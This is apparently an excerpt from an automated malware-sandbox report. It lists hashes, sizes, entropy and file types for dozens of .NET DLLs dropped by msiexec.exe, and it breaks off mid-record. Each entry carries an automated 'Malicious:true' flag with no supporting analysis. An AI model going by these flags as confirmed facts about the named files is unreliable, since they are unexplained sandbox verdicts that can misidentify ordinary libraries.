                                                                                                                                                                                                                                        SSDEEP:192:qrP0CPxxkYWSD+WrpWjA6Kr4PFHnhWgN7a8WgHH6J2OCjVi6KrIX01k9z3ALxQLS:M0+WYWSD+WrYA6VFHRN7L6x49R9zaxQu
                                                                                                                                                                                                                                        MD5:ED46EDD045A16E38ADD5814DCA362B0C
                                                                                                                                                                                                                                        SHA1:8E9CEF564A13E2800FCE2D7B447008AB28C5BA64
                                                                                                                                                                                                                                        SHA-256:A0EF5D467731B176A48C3D6B349EFB0E120365CD6CE700E02B8F02BD0D9FF5B6
                                                                                                                                                                                                                                        SHA-512:930E14F58DF97E446A1C2CD68DB2892FF1BFEBA972A7F6C6F548202269387F18D6E26C08CBF9124E9042C81ACC073A60EFFA2427D34135523ED8643D38C26C8D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33440
                                                                                                                                                                                                                                        Entropy (8bit):6.476067104710918
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:kmSlEcREAwcc1+Wc+bgvPLfmFClits89zSo:RSlEcocc1+Wc+bgvjfyi6zSo
                                                                                                                                                                                                                                        MD5:6EB4649F4FDF0E31924DB943C0F4DE49
                                                                                                                                                                                                                                        SHA1:413C6B6D0531BDBAB8E939D8D6673C30D25AB8BF
                                                                                                                                                                                                                                        SHA-256:D700C814151CE8AFB89419FA0DA373444999993EB99BBEE129C7529C83595BEF
                                                                                                                                                                                                                                        SHA-512:5639B5E9220623D50A40A1D07FBDA9B63B718EBF7AC00B1B1C6807E4FD6464A7B61F0FEDAABC8840D6B0CF09079C6523A571D3C2F2D41FDF204559E526460110
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16664
                                                                                                                                                                                                                                        Entropy (8bit):6.7304228518382665
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:xe1MZK+hTxxYVk+jWhHCWWWhWxNzx95jmHnhWgN7acWafnjyttuX01k9z3A1iaMb:4EpiZjWhHCWLKX6HRN7SSR9zWia87T
                                                                                                                                                                                                                                        MD5:9E6DFCB7B11307322D29628962C8DA01
                                                                                                                                                                                                                                        SHA1:C92E0A8B9C638485F1FBB8E8FF5AD0C7E79B3142
                                                                                                                                                                                                                                        SHA-256:03B4718EC3BEB7F6F5C982C41117CFF12475C0656E3F6741106C9BCA2F582714
                                                                                                                                                                                                                                        SHA-512:4D9C2C0B293C2994BABD297167584BE76438B77595B8936ADC467A54960AA06A3DD6214EA569FA74A16B8B385DA3A068C783851566248A677D73C8AFD61813E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15624
                                                                                                                                                                                                                                        Entropy (8bit):6.785037363575662
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:SFP0axKOW4A3WIEppWjA6Kr4PFHnhWgN7acW7m/yttuX01k9z3A1ir:4PZKOW4A3WIEpYA6VFHRN7GvSR9zWir
                                                                                                                                                                                                                                        MD5:32B77094CD111197938D57101F437A87
                                                                                                                                                                                                                                        SHA1:0D19DE916A18106E63F25E9E0DA4E13519FD0847
                                                                                                                                                                                                                                        SHA-256:27125239D58403F260966DB56F490B94A6992BFC8BB7391E255134BC24B956D3
                                                                                                                                                                                                                                        SHA-512:9BCC1B8A2D17EDA2C97B2F30AFE73C73F747C2318824D93231F6E5C5E274FD724AFE0987D1C77F4F07DF4EB1165BE77C943D439D3370F62B9D932D5744E78CB6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.76516043840326
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:n/msL3vWVszWSYA6VFHRN72JBmo8R9zMLArCYXo:uszVdFCl2TmoQ9zhj4
                                                                                                                                                                                                                                        MD5:D9DD864AC4B90BA4E63AF795256B701F
                                                                                                                                                                                                                                        SHA1:4DBF63E5D8089DFA2792A9A54AA91D6CC2682173
                                                                                                                                                                                                                                        SHA-256:0DA11F94B9CF32240B99497802076E9C4A37CF0F4E46AD83D63FEE3AE7B5CA9A
                                                                                                                                                                                                                                        SHA-512:8758B926D8AAB3D09BEE8AD989EAC867EB989D31D625DF6C6CA9873DBD66B0917657A358CCABDFA4A816DFB7BE877F96A36A0370A9FD58824DBC2159B04A2B82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):45344
                                                                                                                                                                                                                                        Entropy (8bit):6.554040619235554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:bp7oRtyqsSfySDzEjIPvG8lZ6r+WJR9zLjk:bS/Hjnz+0vGU3WJDz
                                                                                                                                                                                                                                        MD5:3B10AEE75EFECF3842D35624FADD1592
                                                                                                                                                                                                                                        SHA1:859B1BC05DB81D2C9E1D4BBB78497201DF4E5F10
                                                                                                                                                                                                                                        SHA-256:F6E56F2540DD97088089B7BCCDF9C8DE63B9EFDCBA8F413C4D691D0D9650B059
                                                                                                                                                                                                                                        SHA-512:EA64E351A623C949EF1E0D0780B5BC2921AAC34698FD106194E87021D2A92200BE2937F2DCBA7651386E4EA6554AE52646174477E4C3D8EC923B4222A6289FB0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22816
                                                                                                                                                                                                                                        Entropy (8bit):6.422373350096493
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1Wgb2WYaXPPGmNOWWWfmXonPQ6X6HRN7wdkyEpcR9zt5dod:F5HGmNG0LWuEpw9zTe
                                                                                                                                                                                                                                        MD5:0CD66CD03167DE27EBA44176A20B1DE6
                                                                                                                                                                                                                                        SHA1:79F3403535AC862911ECC216499325CD0349AE22
                                                                                                                                                                                                                                        SHA-256:6C14B33F85E1F559D4FEC82C188D7377B9AF11D24F17DA66BC6F30FA72ED59AE
                                                                                                                                                                                                                                        SHA-512:4027EB337FCC5271DE79FD72845EDFE65BD1D27B3D2C027E4B789D58A511A9584D0893A6D17C04C3C4209A7720B661A4916EDC62B39F700EC1AC334AC1ABC336
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20128
                                                                                                                                                                                                                                        Entropy (8bit):6.579414670424758
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CWsELWh2IrR/Tvna4EcWQOYA6VFHRN7JBR9zpO1:LS2q/Tvna49OFClJr9zw1
                                                                                                                                                                                                                                        MD5:9797EE9E57A027A698160566E9D90B25
                                                                                                                                                                                                                                        SHA1:466BF47F20DDEE5EBDB17882B6516CB0D3674B82
                                                                                                                                                                                                                                        SHA-256:F04A92B890D871BAA63CED5AAE3A993157B2EDD8AA5996607A046CFE9A4D63F8
                                                                                                                                                                                                                                        SHA-512:0FBDBF279B2E04631FA19E948D2F03499D1B7F1ACC9512B402DBBE2DA7CE12F6090D9393415E94F77D6DE380671506BF4F4BC851F88C103E344371D081CAA66A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18184
                                                                                                                                                                                                                                        Entropy (8bit):6.6208527927079635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:J5y7UByGe9xCEW60W8eNWUYA6VFHRN7B/7R9zb32:faUByGeY0FFClBF9z6
                                                                                                                                                                                                                                        MD5:BA4C37FBECE8728A70A1C5F21154BE54
                                                                                                                                                                                                                                        SHA1:2686CE405CA08FBD43660D80E4475BCCBBCC1D51
                                                                                                                                                                                                                                        SHA-256:58B0A3FF1CE0C24F66A2423883700E12CC92952EE14AD27050351739271225CC
                                                                                                                                                                                                                                        SHA-512:BD60A56C2A6E6D33BA3B103ED0C444781A8EC038CD47EA0F4EB65146E922F52F0EF7BAAF6DE33807A00A663F7ABAF495346C1C649A4FBEFBFD2575C527AFA5E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.812071918414655
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:4915xIWArmWJYA6VFHRN7DmOEBmo8R9zMLlt:s1ehFClDmlmoQ9z8t
                                                                                                                                                                                                                                        MD5:ECD54205E9F9C25C99C25583E31BF19E
                                                                                                                                                                                                                                        SHA1:CBFBC8186DDDE62ADBE8323A68354A04B2C5EDC4
                                                                                                                                                                                                                                        SHA-256:020BA76742ED8911E167343EE9D1BED08C4F3F21C8DDEE0A306D163FF6B58FA0
                                                                                                                                                                                                                                        SHA-512:F9C24AECB0439B8C1EDBBBF6A3E6E90F69DB2B01225D7CBB444F4E757C6625900F695057CCBDB4DEDA40C7B24BE879DFB61324A0B1D908DDAAD9418E40FD5D92
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):31904
                                                                                                                                                                                                                                        Entropy (8bit):6.4408952831148465
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:NWHhUWxi5ciERQXIG6KMWFYpmGRuOWB/r1YA6VFHRN7ZE76R9zqgGcwH:gHpKMWFkmGsvBhFCli729z58
                                                                                                                                                                                                                                        MD5:7BC6DA57F4A287DE416B8DF0C1ECCF44
                                                                                                                                                                                                                                        SHA1:355DB90FE8B41076042315E3F8E967A3608DD2C6
                                                                                                                                                                                                                                        SHA-256:49314E6C92F60098842088CC69B2EA044F28EA571983191B6154F327302066E3
                                                                                                                                                                                                                                        SHA-512:C9B29F0DC2BE91D61EE4AEEDEB20F8C2526E0CED3A191E565AE118769101B83174AF091EDF9892FC10A39A199B6FC6B4A46A54E561BF24F76D74D23B0A699166
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51872
                                                                                                                                                                                                                                        Entropy (8bit):6.472004749878635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:C5oK6fKfIPMWW/z2rg8Z61rvZqhwFLUFMjVYuPkKFClZts89zCVi:C5oWfIP8z2r1GqhwFIFMjVPPkmibzB
                                                                                                                                                                                                                                        MD5:268A59245835DBFBFD3C23BF744D39D5
                                                                                                                                                                                                                                        SHA1:55874A6B8EEC97204791FE1DCB081E85E50CA1C0
                                                                                                                                                                                                                                        SHA-256:0CD3306A5380E59B1C61B16461DD8A0A76E58D677E7DA1EC3741BB64EFA25AAA
                                                                                                                                                                                                                                        SHA-512:6929A0F97B645AE062F6FDE1F8593AA3AA4E89F14BC9A253718615477FE79D5DE60AECFE4C33B32B0579719AC2AC241A5B243D3CA0063ACB1CDEB984C858756A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16656
                                                                                                                                                                                                                                        Entropy (8bit):6.679809972102448
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:G1d+WmkLW/YA6VFHRN7IUmRxB+R9zrPGkq21:4EFClIUmRxw9zb/1
                                                                                                                                                                                                                                        MD5:115B64552BE0B3A33E0645EB04D78D65
                                                                                                                                                                                                                                        SHA1:A7EE75D3913B34AEE6516DCA723FF5A0BDD46B78
                                                                                                                                                                                                                                        SHA-256:9FA85D63880EB178AC4D425F54E3A25A2E863EBF8DF62ABDA3333AD711B1ADAD
                                                                                                                                                                                                                                        SHA-512:93D02C37FA25936EC59F3EC1905BB071576044AC4347233833E7D692EF8FF5C6110B836EE92E5EC59BAFB8CC291185DCF694DA3C0493010A85B2993D55B39E3B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16144
                                                                                                                                                                                                                                        Entropy (8bit):6.728895977359552
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:v0SQa4xxo6VW5bGWavpWjA6Kr4PFHnhWgN7agWM4DyH8RwX01k9z3A1Zx+XL7DnK:zQ36wW5bGWuYA6VFHRN7d9R9zmwjK
                                                                                                                                                                                                                                        MD5:B7D249F4C68AD5B4714FEB092732FFF4
                                                                                                                                                                                                                                        SHA1:B01157C38E9F36D0906ABA7292E546DAFC1059D5
                                                                                                                                                                                                                                        SHA-256:C58ED48A3B29E49D9DBF47338192E91F2CE16870973F6C20B316BA7747738497
                                                                                                                                                                                                                                        SHA-512:45FDA399159E5E7F0121A4672F36D3CA9B9CA24D66E810B0838C6D5BF331B8AC73905EBABE756F850E4E38BF96EF09ED0A0F08183067EF708447E0A136E61E31
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):221960
                                                                                                                                                                                                                                        Entropy (8bit):6.873049679860797
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:YjBg53qIzkOGjMD1jUZVEJrSlLXuDcWroW6p:8BgxqIz1GgDRKVEJO5uDcWji
                                                                                                                                                                                                                                        MD5:83067009F7425B98D4BDF066B6124469
                                                                                                                                                                                                                                        SHA1:DCBDD19E21C0734BAB3804908585C96F06E06CE3
                                                                                                                                                                                                                                        SHA-256:E3EFC3989359B0B0F66D1BED6B390F47B086E854FA1C96269244B353986A23BC
                                                                                                                                                                                                                                        SHA-512:B4CE3EF0C9E5B1288AA3BB159769C557B2409C34FA7250FA0FAB54A0C310031D834C6F948FF7DA4D27381AD9259E5E4285F414525CADAC64ECE080AAE88474CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):322840
                                                                                                                                                                                                                                        Entropy (8bit):6.6930952327752244
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:J2BNIzFraZFu5UJgNFmZzq5tqdKfB8wLyHfHwO/S14CFYgbj:eupaYUJgNFmZc+L/HwOsdD3
                                                                                                                                                                                                                                        MD5:118E45018A071C186DAB988B8DBB197F
                                                                                                                                                                                                                                        SHA1:9941E8744E34A5C932A1C76EB8AE8B1E7ABB3513
                                                                                                                                                                                                                                        SHA-256:3C9BAEE2E1D99E4145E3A3B26F9F53F7D1665239502AA16EC54F3666CDF0F84B
                                                                                                                                                                                                                                        SHA-512:A09C4219A56AEC62B00715E0DBBDBC899C089DBA1A834DDBBC5331B2840F24FE2A67B0714852D7F40248FC3C34928956AA3445B7A9B3CC752A54BD82648E9E3D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.714776898123936
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:QHqvyVWbumdB5W6fYA6VFHRN7pHR9z775md:AMyWXdBDFClj9zv5md
                                                                                                                                                                                                                                        MD5:1C18ECDFAFDCB5BE7926AC0444104990
                                                                                                                                                                                                                                        SHA1:77F654018ABC84CB8212E8D32BCC44A50C965BA2
                                                                                                                                                                                                                                        SHA-256:1A063D6F812489C64273AFC760B06C04E04BE1C140E7B196A0946D0D0175C8F2
                                                                                                                                                                                                                                        SHA-512:5AB501B82128514F718DB64796AE701CC612B7FAE62C0427EFCDD29869FF2A7DE6D257254CA785278EC459FD340DB770A14FE87E28B8C67409A95C0296DC7DE7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):28832
                                                                                                                                                                                                                                        Entropy (8bit):6.457861200692383
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:jHWFI0JBrWtmtrwhpKH0sdbnMbKF+87makO2akSMHHDGEHsfbEbIYA6VFHRN7hBC:jqDJB+mtrewOW+8dxr1FCl7moQ9zV
                                                                                                                                                                                                                                        MD5:288B58AF49B3F25FE4BDDD61A7D87249
                                                                                                                                                                                                                                        SHA1:2CC6789B40BE3ADC7C48C22A469B03294909ED1B
                                                                                                                                                                                                                                        SHA-256:52E0F82696E628D652B2A88D3B82281B48729FAE5DDF171DC8A564B3C7C4402E
                                                                                                                                                                                                                                        SHA-512:8B8A7BC267A7CD5A4F65AE0951139B886C472E374769E2367CC47B658035C734BA73254D148EEB51FD8520F73708A77C3CC7A446CC2FD4944AB74B015383FF7C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16544
                                                                                                                                                                                                                                        Entropy (8bit):6.7468972537613645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:0YklmI8NQv4RMWsBdBBgWsYA6VFHRN7PtHNsAR9z/rV:TklmI8NQwRibBBiFClFts89zzV
                                                                                                                                                                                                                                        MD5:BA0279DD1B0B0EB313A8BB8E55F06B3D
                                                                                                                                                                                                                                        SHA1:A15B141F593ED49233423080E257888DEAEA2538
                                                                                                                                                                                                                                        SHA-256:6DDE7015FCCB3AA24D6ADA31AD6796688205902195CE2CFB17360FD08A7B9204
                                                                                                                                                                                                                                        SHA-512:B76E0511DCA2BC0AF8F4A0C3DF6673DC6A2F932065AEA157219A55442F3D5606A633D77DEEB931741E3750CA8B24D6FD261A34D4A2A46CAD7E16470100DA107B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17568
                                                                                                                                                                                                                                        Entropy (8bit):6.623513768064609
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:P6EvDj8NdwiLWgM54BHWFYA6VFHRN7oZBmo8R9zMLp:P6EvDj8NeiP24BuFClWmoQ9z6
                                                                                                                                                                                                                                        MD5:31BAEBC3E399093FB5925DB986172010
                                                                                                                                                                                                                                        SHA1:7ED9BB1471103CA17C5C5E4967D9EB09CC71B6E3
                                                                                                                                                                                                                                        SHA-256:6CD19434D4C97B20ACEC04EB372D08480072D16EB73EAB23D181854A8E789F3E
                                                                                                                                                                                                                                        SHA-512:232C4210C8C568346A2B342AC28EBEE631B5185CD8F2BF24F347EDBA02046F53887A0F9D4CDB89E6EC4B34C1E9FB65437E24728395B8A1F4E174359751D73CC6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):42656
                                                                                                                                                                                                                                        Entropy (8bit):5.805080563655079
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wBV0jdpFKYl5f4bGRi2xVbcVT4pEQPFClV629zR:MedGYl5f4bGR3G0mQ9ioCzR
                                                                                                                                                                                                                                        MD5:3C99EB88F752B9D377C96ABE31B7CC06
                                                                                                                                                                                                                                        SHA1:3B7BB82E17FACDBFF666243E57D3B19B2565D09E
                                                                                                                                                                                                                                        SHA-256:787FF92525E6F78436E27C144BF888EE9714F07BF0ADD7EB8BFE1F7326E31810
                                                                                                                                                                                                                                        SHA-512:07B15FE4A1576E5346FB05F69276A11F9F94F9CD9131A25F8062631C276765C8445912025B9C633B81E5D4544261A8B5B664B87A679E6613CC91C4E21A6917DC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215320
                                                                                                                                                                                                                                        Entropy (8bit):6.694713736900479
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:2GFAFB57nGa7V/aDGB0krnx7lZnFW2iBeVICTiupU8TVUnVZ5PDMXZo1cQtSckOi:A7GaRaiBv7lZoeXZ/MI1
                                                                                                                                                                                                                                        MD5:1CD883D7FC4B80840F269602EBE7EC72
                                                                                                                                                                                                                                        SHA1:7301B341569A5FB6085795EC5DC016B5CB93ACDB
                                                                                                                                                                                                                                        SHA-256:91D7D0C8DE0D1B387200906EEF67D528BBCB8EC0D9726F292B6EBFDDA71E95DC
                                                                                                                                                                                                                                        SHA-512:9CF35D3E26F254180658F42C2BBDCB7EBDDF9B736F1F17C60C9A83912D477A9604C954C288303CD865E34C53D6B641EBFE90A9AEE4723E2D64C52614B12653D6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):94368
                                                                                                                                                                                                                                        Entropy (8bit):6.447995362526241
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:HeNGF95xttKvsq85yOuX3upafbqb958kGOQwQ7rzUU3q2bP6MOVK1iKmVzk:HeIF95VKscOuX3upEbqfyOVoOY
                                                                                                                                                                                                                                        MD5:649F20AA9F4B7DD23EB7160023B0A56E
                                                                                                                                                                                                                                        SHA1:A553D8B8A1EC4696616BC9D34CB33ED9AEBBB04C
                                                                                                                                                                                                                                        SHA-256:6E6FFD7211B25A806A466B48A729818A7A7592570D2BF926B8AC04D078220102
                                                                                                                                                                                                                                        SHA-512:C84C26A99CBF44831776F8CE7739112F385F779DEAF7F2256D4824EAF1BC013D6EE18B7B92F24B4D2257FED87ECBA8EB6BB1209795FC240D752FD2B5386F9641
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):808712
                                                                                                                                                                                                                                        Entropy (8bit):6.667176908618659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:p9Dux8VLSQjVqSlDrd571xOEc8wRBul3v8x5d4BSV:ptux8VLSQjVqSlDrd5n+BuZEx5d4BK
                                                                                                                                                                                                                                        MD5:A266B1B3765863C6F80A8A7DA92EBE06
                                                                                                                                                                                                                                        SHA1:2CE8B15DA8CEC846F447B7A1E3486883784DA143
                                                                                                                                                                                                                                        SHA-256:19595880A932FC70CBF4DC31C122E3341DFA6CFB9E3EE9999D66D861C4B03F66
                                                                                                                                                                                                                                        SHA-512:E01C2F91C20361D105CFF994E62D1AAC1D7788884F3DD076BEE287503958F23F182B60A7A5C7094B387711BC0B2032AF8A2D31FC8408D85B2DF91A0BFC85767E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):486560
                                                                                                                                                                                                                                        Entropy (8bit):6.689433219916561
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:D0pdtbsk7ZTs0ilUfa0BEuUWZwgZExhelA1z:+DNTvih0BEuUWCgZExhxz
                                                                                                                                                                                                                                        MD5:01DA5B74F8CEA47CCDD769EA34B2E7E7
                                                                                                                                                                                                                                        SHA1:A9D2B1983176ADA553B4B608F2F5515432718425
                                                                                                                                                                                                                                        SHA-256:7B5C8CB2871FA9C53F20CB5316906CDD610357C904734C1E4B5BCC738FA29CB2
                                                                                                                                                                                                                                        SHA-512:9C260DF60E5F631751C2761E58A27D019E3515AF594C44557B36EA9A3CCCB976014C3767ED680637EFDA20D0EE77FC38ABBD7EF94186E17B3BE27D9566B10DF5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):189600
                                                                                                                                                                                                                                        Entropy (8bit):6.633371366781308
                                                                                                                                                                                                                                        Encrypted:false
